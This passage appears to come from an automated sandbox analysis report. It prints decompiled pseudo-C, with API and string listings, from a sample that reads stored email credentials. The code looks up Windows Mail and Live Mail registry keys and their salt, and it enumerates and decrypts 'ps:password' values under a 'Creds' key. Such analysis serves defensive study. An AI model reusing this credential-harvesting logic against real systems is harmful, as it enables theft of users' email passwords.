                                                                                                • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                              • strlen.MSVCRT ref: 0041054C
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0041055C
                                                                                              • memset.MSVCRT ref: 004105A8
                                                                                              • memset.MSVCRT ref: 004105C5
                                                                                              • strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 004105F3
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00410637
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410688
                                                                                              • LocalFree.KERNEL32(?), ref: 0041069D
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004106A6
                                                                                                • Part of subcall function 00406512: strtoul.MSVCRT ref: 0040651A
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows Live Mail, xrefs: 004105E7
                                                                                              • Software\Microsoft\Windows Mail, xrefs: 004105DB
                                                                                              • Salt, xrefs: 00410621
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                              • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                              • API String ID: 1673043434-2687544566
                                                                                              • Opcode ID: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                                                              • Instruction ID: 7afd7cd9a60bb03764dcbc3854d87102a14f95683297c5d7d0928fc071fa2b2b
                                                                                              • Opcode Fuzzy Hash: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                                                              • Instruction Fuzzy Hash: D14186B2C0011CAECB11DBA5DC81ADEBBBCAF48344F1041ABE645F3251DA349A95CB68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040CBA7, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 82%
                                                                                              			E0040CBA7(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void _v619;
				char _v620;
				void _v1231;
				char _v1232;
				void* __edi;
				void* _t37;
				void* _t53;
				char* _t54;
				intOrPtr _t60;
				void* _t61;
				char* _t62;
				void* _t67;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t87;
				void* _t88;
				void* _t89;

				_t87 = _a4;
				_t84 = __ecx;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
					_t37 = 0;
				} else {
					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
				}
				_push(0xa);
				_push("mailbox://");
				_push(_t37);
				L00411612();
				_t89 = _t88 + 0xc;
				if(_t37 == 0) {
					L8:
					_a4 = 0;
					if( *((intOrPtr*)(_t84 + 0x474)) > 0) {
						while(1) {
							_t85 = E0040D438(_a4, _t84 + 0x468);
							_v620 = 0;
							memset( &_v619, 0, 0x261);
							_v1232 = 0;
							memset( &_v1231, 0, 0x261);
							_t17 = _t85 + 0x104; // 0x104
							_t18 = _t85 + 0x204; // 0x204
							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
							_t20 = _t85 + 0x104; // 0x104
							_t21 = _t85 + 0x204; // 0x204
							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
							_t53 = 0;
							_t89 = _t89 + 0x38;
							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
								_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
							}
							_push(_t53);
							_t54 =  &_v620;
							_push(_t54);
							L004115B2();
							if(_t54 == 0) {
								goto L17;
							}
							_t61 = 0;
							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
							}
							_push(_t61);
							_t62 =  &_v1232;
							_push(_t62);
							L004115B2();
							if(_t62 != 0) {
								L18:
								_a4 = _a4 + 1;
								_t60 = _v8;
								if(_a4 <  *((intOrPtr*)(_t60 + 0x474))) {
									_t84 = _t60;
									continue;
								} else {
								}
							} else {
								goto L17;
							}
							goto L21;
							L17:
							if( *((char*)(E00406B0F( *((intOrPtr*)(_t87 + 0x1c)) - 1, _t87))) == 0x7e) {
								E00401380(_t57 + 1, _t85 + 0x304, 0xff);
							} else {
								goto L18;
							}
							goto L21;
						}
					}
				} else {
					if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
						_t67 = 0;
					} else {
						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
					}
					_push(7);
					_push("imap://");
					_push(_t67);
					L00411612();
					_t89 = _t89 + 0xc;
					if(_t67 == 0) {
						goto L8;
					}
				}
				L21:
				return 1;
			}





















                                                                                              0x0040cbb2
                                                                                              0x0040cbbb
                                                                                              0x0040cbbd
                                                                                              0x0040cbc0
                                                                                              0x0040cbcc
                                                                                              0x0040cbc2
                                                                                              0x0040cbc7
                                                                                              0x0040cbc7
                                                                                              0x0040cbce
                                                                                              0x0040cbd0
                                                                                              0x0040cbd5
                                                                                              0x0040cbd6
                                                                                              0x0040cbdb
                                                                                              0x0040cbe0
                                                                                              0x0040cc0b
                                                                                              0x0040cc11
                                                                                              0x0040cc14
                                                                                              0x0040cc23
                                                                                              0x0040cc32
                                                                                              0x0040cc3d
                                                                                              0x0040cc44
                                                                                              0x0040cc53
                                                                                              0x0040cc5a
                                                                                              0x0040cc5f
                                                                                              0x0040cc66
                                                                                              0x0040cc79
                                                                                              0x0040cc7e
                                                                                              0x0040cc85
                                                                                              0x0040cc98
                                                                                              0x0040cc9d
                                                                                              0x0040cc9f
                                                                                              0x0040cca5
                                                                                              0x0040ccac
                                                                                              0x0040ccac
                                                                                              0x0040ccaf
                                                                                              0x0040ccb0
                                                                                              0x0040ccb6
                                                                                              0x0040ccb7
                                                                                              0x0040ccc0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ccc2
                                                                                              0x0040ccc7
                                                                                              0x0040ccce
                                                                                              0x0040ccce
                                                                                              0x0040ccd1
                                                                                              0x0040ccd2
                                                                                              0x0040ccd8
                                                                                              0x0040ccd9
                                                                                              0x0040cce2
                                                                                              0x0040ccf4
                                                                                              0x0040ccf4
                                                                                              0x0040ccf7
                                                                                              0x0040cd03
                                                                                              0x0040cc21
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040cd09
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040cce4
                                                                                              0x0040ccf2
                                                                                              0x0040cd17
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ccf2
                                                                                              0x0040cc23
                                                                                              0x0040cbe2
                                                                                              0x0040cbe5
                                                                                              0x0040cbf1
                                                                                              0x0040cbe7
                                                                                              0x0040cbec
                                                                                              0x0040cbec
                                                                                              0x0040cbf3
                                                                                              0x0040cbf5
                                                                                              0x0040cbfa
                                                                                              0x0040cbfb
                                                                                              0x0040cc00
                                                                                              0x0040cc05
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040cc05
                                                                                              0x0040cd1e
                                                                                              0x0040cd24

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _stricmp_strnicmpmemsetsprintf$strlen
                                                                                              • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                              • API String ID: 4281260487-2229823034
                                                                                              • Opcode ID: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
                                                                                              • Instruction ID: 9e102a0fb77db954c7e66e430d6901f6f24083c0ab16dd7aca32eaa7b9d40139
                                                                                              • Opcode Fuzzy Hash: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
                                                                                              • Instruction Fuzzy Hash: B84163B1604205EFD724DB69C881F96B7E8AF04344F144A7BEA4AE7281D738FA448B58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040CBA5, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 82%
                                                                                              			E0040CBA5(void* __eax, intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void _v619;
				char _v620;
				void _v1231;
				char _v1232;
				void* __edi;
				void* _t39;
				void* _t55;
				char* _t56;
				intOrPtr _t62;
				void* _t63;
				char* _t64;
				void* _t69;
				intOrPtr _t89;
				void* _t91;
				intOrPtr _t94;
				void* _t99;
				void* _t100;
				void* _t101;

				_t100 = _t99 - 0x4cc;
				_t94 = _a4;
				_t89 = __ecx;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
					_t39 = 0;
				} else {
					_t39 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
				}
				_push(0xa);
				_push("mailbox://");
				_push(_t39);
				L00411612();
				_t101 = _t100 + 0xc;
				if(_t39 == 0) {
					L9:
					_a4 = 0;
					if( *((intOrPtr*)(_t89 + 0x474)) > 0) {
						while(1) {
							_t91 = E0040D438(_a4, _t89 + 0x468);
							_v620 = 0;
							memset( &_v619, 0, 0x261);
							_v1232 = 0;
							memset( &_v1231, 0, 0x261);
							_t17 = _t91 + 0x104; // 0x104
							_t18 = _t91 + 0x204; // 0x204
							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
							_t20 = _t91 + 0x104; // 0x104
							_t21 = _t91 + 0x204; // 0x204
							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
							_t55 = 0;
							_t101 = _t101 + 0x38;
							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
								_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
							}
							_push(_t55);
							_t56 =  &_v620;
							_push(_t56);
							L004115B2();
							if(_t56 == 0) {
								goto L18;
							}
							_t63 = 0;
							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
							}
							_push(_t63);
							_t64 =  &_v1232;
							_push(_t64);
							L004115B2();
							if(_t64 != 0) {
								L19:
								_a4 = _a4 + 1;
								_t62 = _v8;
								if(_a4 <  *((intOrPtr*)(_t62 + 0x474))) {
									_t89 = _t62;
									continue;
								} else {
								}
							} else {
								goto L18;
							}
							goto L22;
							L18:
							if( *((char*)(E00406B0F( *((intOrPtr*)(_t94 + 0x1c)) - 1, _t94))) == 0x7e) {
								E00401380(_t59 + 1, _t91 + 0x304, 0xff);
							} else {
								goto L19;
							}
							goto L22;
						}
					}
				} else {
					if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
						_t69 = 0;
					} else {
						_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
					}
					_push(7);
					_push("imap://");
					_push(_t69);
					L00411612();
					_t101 = _t101 + 0xc;
					if(_t69 == 0) {
						goto L9;
					}
				}
				L22:
				return 1;
			}






















                                                                                              0x0040cbaa
                                                                                              0x0040cbb2
                                                                                              0x0040cbbb
                                                                                              0x0040cbbd
                                                                                              0x0040cbc0
                                                                                              0x0040cbcc
                                                                                              0x0040cbc2
                                                                                              0x0040cbc7
                                                                                              0x0040cbc7
                                                                                              0x0040cbce
                                                                                              0x0040cbd0
                                                                                              0x0040cbd5
                                                                                              0x0040cbd6
                                                                                              0x0040cbdb
                                                                                              0x0040cbe0
                                                                                              0x0040cc0b
                                                                                              0x0040cc11
                                                                                              0x0040cc14
                                                                                              0x0040cc23
                                                                                              0x0040cc32
                                                                                              0x0040cc3d
                                                                                              0x0040cc44
                                                                                              0x0040cc53
                                                                                              0x0040cc5a
                                                                                              0x0040cc5f
                                                                                              0x0040cc66
                                                                                              0x0040cc79
                                                                                              0x0040cc7e
                                                                                              0x0040cc85
                                                                                              0x0040cc98
                                                                                              0x0040cc9d
                                                                                              0x0040cc9f
                                                                                              0x0040cca5
                                                                                              0x0040ccac
                                                                                              0x0040ccac
                                                                                              0x0040ccaf
                                                                                              0x0040ccb0
                                                                                              0x0040ccb6
                                                                                              0x0040ccb7
                                                                                              0x0040ccc0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ccc2
                                                                                              0x0040ccc7
                                                                                              0x0040ccce
                                                                                              0x0040ccce
                                                                                              0x0040ccd1
                                                                                              0x0040ccd2
                                                                                              0x0040ccd8
                                                                                              0x0040ccd9
                                                                                              0x0040cce2
                                                                                              0x0040ccf4
                                                                                              0x0040ccf4
                                                                                              0x0040ccf7
                                                                                              0x0040cd03
                                                                                              0x0040cc21
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040cd09
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040cce4
                                                                                              0x0040ccf2
                                                                                              0x0040cd17
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ccf2
                                                                                              0x0040cc23
                                                                                              0x0040cbe2
                                                                                              0x0040cbe5
                                                                                              0x0040cbf1
                                                                                              0x0040cbe7
                                                                                              0x0040cbec
                                                                                              0x0040cbec
                                                                                              0x0040cbf3
                                                                                              0x0040cbf5
                                                                                              0x0040cbfa
                                                                                              0x0040cbfb
                                                                                              0x0040cc00
                                                                                              0x0040cc05
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040cc05
                                                                                              0x0040cd1d
                                                                                              0x0040cd24

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _stricmp_strnicmpmemsetsprintf
                                                                                              • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                              • API String ID: 2822975062-2229823034
                                                                                              • Opcode ID: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                                                              • Instruction ID: 56d5f4bbafa72d85e66e322173295d9522024af121689b7315c9fa9ceefdefbd
                                                                                              • Opcode Fuzzy Hash: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                                                              • Instruction Fuzzy Hash: 754150B1604605EFD724DB69C8C1F96B7E8AF04304F14466BEA4AE7281D738FA45CB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D6FB, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 118registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 56%
                                                                                              			E0040D6FB(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, char _a12, void* _a16) {
				int _v8;
				int _v12;
				void* _v16;
				short* _v20;
				int _v24;
				char* _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				int _v44;
				void _v299;
				char _v300;
				char _v556;
				char _v812;
				char _v4908;
				void* __ebx;
				void* __edi;
				long _t46;
				int* _t84;
				char* _t85;

				E004118A0(0x132c, __ecx);
				_t84 = 0;
				_t46 = RegOpenKeyExA(_a16, "Creds", 0, 0x20019,  &_a16);
				if(_t46 != 0) {
					return _t46;
				}
				_v300 = _t46;
				memset( &_v299, 0, 0xff);
				_push(0xff);
				_push( &_v300);
				_v8 = 0;
				_push(0);
				while(RegEnumKeyA(_a16, ??, ??, ??) == 0) {
					if(RegOpenKeyExA(_a16,  &_v300, _t84, 0x20019,  &_v16) == 0) {
						_v12 = 0x1000;
						if(RegQueryValueExA(_v16, "ps:password", _t84,  &_v44,  &_v4908,  &_v12) == 0) {
							_v32 = _v12;
							_v28 =  &_v4908;
							_v40 = _a12;
							_v36 = _a8;
							if(E00404811(_a4 + 0xc,  &_v32,  &_v40,  &_v24) != 0) {
								_t85 =  &_v812;
								_v812 = 0;
								_v556 = 0;
								E004060D0(0xff, _t85,  &_v300);
								WideCharToMultiByte(0, 0, _v20, _v24,  &_v556, 0xff, 0, 0);
								 *((intOrPtr*)( *_a4))(_t85);
								LocalFree(_v20);
								_t84 = 0;
							}
						}
						RegCloseKey(_v16);
					}
					_v8 = _v8 + 1;
					_push(0xff);
					_push( &_v300);
					_push(_v8);
				}
				return RegCloseKey(_a16);
			}























                                                                                              0x0040d703
                                                                                              0x0040d71a
                                                                                              0x0040d725
                                                                                              0x0040d729
                                                                                              0x0040d862
                                                                                              0x0040d862
                                                                                              0x0040d735
                                                                                              0x0040d743
                                                                                              0x0040d74b
                                                                                              0x0040d752
                                                                                              0x0040d753
                                                                                              0x0040d756
                                                                                              0x0040d844
                                                                                              0x0040d774
                                                                                              0x0040d792
                                                                                              0x0040d7a1
                                                                                              0x0040d7aa
                                                                                              0x0040d7b3
                                                                                              0x0040d7b9
                                                                                              0x0040d7bf
                                                                                              0x0040d7db
                                                                                              0x0040d7e4
                                                                                              0x0040d7ea
                                                                                              0x0040d7f1
                                                                                              0x0040d7f8
                                                                                              0x0040d812
                                                                                              0x0040d820
                                                                                              0x0040d825
                                                                                              0x0040d82b
                                                                                              0x0040d82b
                                                                                              0x0040d7db
                                                                                              0x0040d830
                                                                                              0x0040d830
                                                                                              0x0040d836
                                                                                              0x0040d839
                                                                                              0x0040d840
                                                                                              0x0040d841
                                                                                              0x0040d841
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                                              • memset.MSVCRT ref: 0040D743
                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040D770
                                                                                              • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040D799
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040D812
                                                                                              • LocalFree.KERNEL32(?), ref: 0040D825
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040D830
                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                              • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                              • API String ID: 551151806-1288872324
                                                                                              • Opcode ID: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                                                              • Instruction ID: ba0b8c8cecfa7ea512c31dd79fcda3fb233e403caecda4e29e00fc0c4110e127
                                                                                              • Opcode Fuzzy Hash: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                                                              • Instruction Fuzzy Hash: 864129B2900209AFDB11DF95DD84EEFBBBCEB48344F0041A6FA15E2150DA749A94CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004080A3, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 56%
                                                                                              			E004080A3(void* __ecx, void* __edi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
				void _v4103;
				char _v4104;
				char _t30;
				struct HMENU__* _t32;
				char _t39;
				void* _t42;
				struct HWND__* _t43;
				struct HMENU__* _t48;

				_t42 = __edi;
				_t38 = __ecx;
				E004118A0(0x1004, __ecx);
				_t55 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t39 =  *0x417488;
						__eflags = _t39;
						if(_t39 == 0) {
							L8:
							_push(_t42);
							sprintf(0x4172c0, "dialog_%d", _a12);
							_t43 = CreateDialogParamA(_a4, _a12, 0, E0040809E, 0);
							_v4104 = 0;
							memset( &_v4103, 0, 0x1000);
							GetWindowTextA(_t43,  &_v4104, 0x1000);
							__eflags = _v4104;
							if(__eflags != 0) {
								E00407E55(__eflags, "caption",  &_v4104);
							}
							EnumChildWindows(_t43, E00407FEB, 0);
							DestroyWindow(_t43);
						} else {
							while(1) {
								_t30 =  *_t39;
								__eflags = _t30;
								if(_t30 == 0) {
									goto L8;
								}
								__eflags = _t30 - _a12;
								if(_t30 != _a12) {
									_t39 = _t39 + 4;
									__eflags = _t39;
									continue;
								}
								goto L11;
							}
							goto L8;
						}
						L11:
					}
				} else {
					sprintf(0x4172c0, "menu_%d", _a12);
					_t32 = LoadMenuA(_a4, _a12);
					 *0x4171b4 =  *0x4171b4 & 0x00000000;
					_t48 = _t32;
					_push(1);
					_push(_t48);
					_push(_a12);
					E00407EFB(_t38, _t55);
					DestroyMenu(_t48);
				}
				return 1;
			}











                                                                                              0x004080a3
                                                                                              0x004080a3
                                                                                              0x004080ab
                                                                                              0x004080b0
                                                                                              0x004080b5
                                                                                              0x004080fb
                                                                                              0x004080ff
                                                                                              0x00408105
                                                                                              0x0040810e
                                                                                              0x00408110
                                                                                              0x00408126
                                                                                              0x00408126
                                                                                              0x00408134
                                                                                              0x00408155
                                                                                              0x0040815f
                                                                                              0x00408165
                                                                                              0x00408176
                                                                                              0x0040817c
                                                                                              0x00408182
                                                                                              0x00408190
                                                                                              0x00408196
                                                                                              0x0040819e
                                                                                              0x004081a5
                                                                                              0x00408112
                                                                                              0x00408120
                                                                                              0x00408120
                                                                                              0x00408122
                                                                                              0x00408124
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00408114
                                                                                              0x00408117
                                                                                              0x0040811d
                                                                                              0x0040811d
                                                                                              0x00000000
                                                                                              0x0040811d
                                                                                              0x00000000
                                                                                              0x00408117
                                                                                              0x00000000
                                                                                              0x00408120
                                                                                              0x004081ac
                                                                                              0x004081ac
                                                                                              0x004080b7
                                                                                              0x004080c4
                                                                                              0x004080d2
                                                                                              0x004080d8
                                                                                              0x004080df
                                                                                              0x004080e1
                                                                                              0x004080e3
                                                                                              0x004080e4
                                                                                              0x004080e7
                                                                                              0x004080f0
                                                                                              0x004080f0
                                                                                              0x004081b2

                                                                                              APIs
                                                                                              • sprintf.MSVCRT ref: 004080C4
                                                                                              • LoadMenuA.USER32 ref: 004080D2
                                                                                                • Part of subcall function 00407EFB: GetMenuItemCount.USER32 ref: 00407F10
                                                                                                • Part of subcall function 00407EFB: memset.MSVCRT ref: 00407F31
                                                                                                • Part of subcall function 00407EFB: GetMenuItemInfoA.USER32 ref: 00407F6C
                                                                                                • Part of subcall function 00407EFB: strchr.MSVCRT ref: 00407F83
                                                                                              • DestroyMenu.USER32(00000000), ref: 004080F0
                                                                                              • sprintf.MSVCRT ref: 00408134
                                                                                              • CreateDialogParamA.USER32(?,00000000,00000000,0040809E,00000000), ref: 00408149
                                                                                              • memset.MSVCRT ref: 00408165
                                                                                              • GetWindowTextA.USER32 ref: 00408176
                                                                                              • EnumChildWindows.USER32 ref: 0040819E
                                                                                              • DestroyWindow.USER32(00000000), ref: 004081A5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                              • String ID: caption$dialog_%d$menu_%d
                                                                                              • API String ID: 3259144588-3822380221
                                                                                              • Opcode ID: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                                                              • Instruction ID: 30012a8f5e5a5bdbe68f816da8837f1ba63c4ed8b40bd3c0dd12f77501d21500
                                                                                              • Opcode Fuzzy Hash: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                                                              • Instruction Fuzzy Hash: 14212172544248BBDB22AF60DD41EEF3B78EF05305F00407AFA41A2190DABC9DA58B6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E056, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040E056() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x417514 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleA("kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x416fe0 = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x416fd8 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x416fd4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x416e6c = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x416fcc = _t2;
								if(_t2 != 0) {
									 *0x417514 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                              0x0040e05d
                                                                                              0x0040e0d9
                                                                                              0x0040e0d9
                                                                                              0x0040e065
                                                                                              0x0040e06b
                                                                                              0x0040e06f
                                                                                              0x0040e0d8
                                                                                              0x00000000
                                                                                              0x0040e0d8
                                                                                              0x0040e07e
                                                                                              0x0040e082
                                                                                              0x0040e087
                                                                                              0x0040e08f
                                                                                              0x0040e093
                                                                                              0x0040e098
                                                                                              0x0040e0a0
                                                                                              0x0040e0a4
                                                                                              0x0040e0a9
                                                                                              0x0040e0b1
                                                                                              0x0040e0b5
                                                                                              0x0040e0ba
                                                                                              0x0040e0c2
                                                                                              0x0040e0c6
                                                                                              0x0040e0cb
                                                                                              0x0040e0cd
                                                                                              0x0040e0cd
                                                                                              0x0040e0cb
                                                                                              0x0040e0ba
                                                                                              0x0040e0a9
                                                                                              0x0040e098
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040DD19), ref: 0040E065
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E07E
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E08F
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E0A0
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E0B1
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E0C2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                              • API String ID: 667068680-3953557276
                                                                                              • Opcode ID: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                                                              • Instruction ID: 921299a9b586d994e9bf5e85ab2a2688844625279e80e39ff2614b99c2d6d575
                                                                                              • Opcode Fuzzy Hash: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                                                              • Instruction Fuzzy Hash: 8DF06D70A45222A9C320CB266D00FFA3DA85A44B81B15843BE900F1694DBF8D5528B7C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404647, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00404647(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
				void* __esi;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__** _t23;

				_t23 = __eax;
				E004046C2(__eax);
				_t12 = LoadLibraryA("advapi32.dll");
				 *_t23 = _t12;
				if(_t12 != 0) {
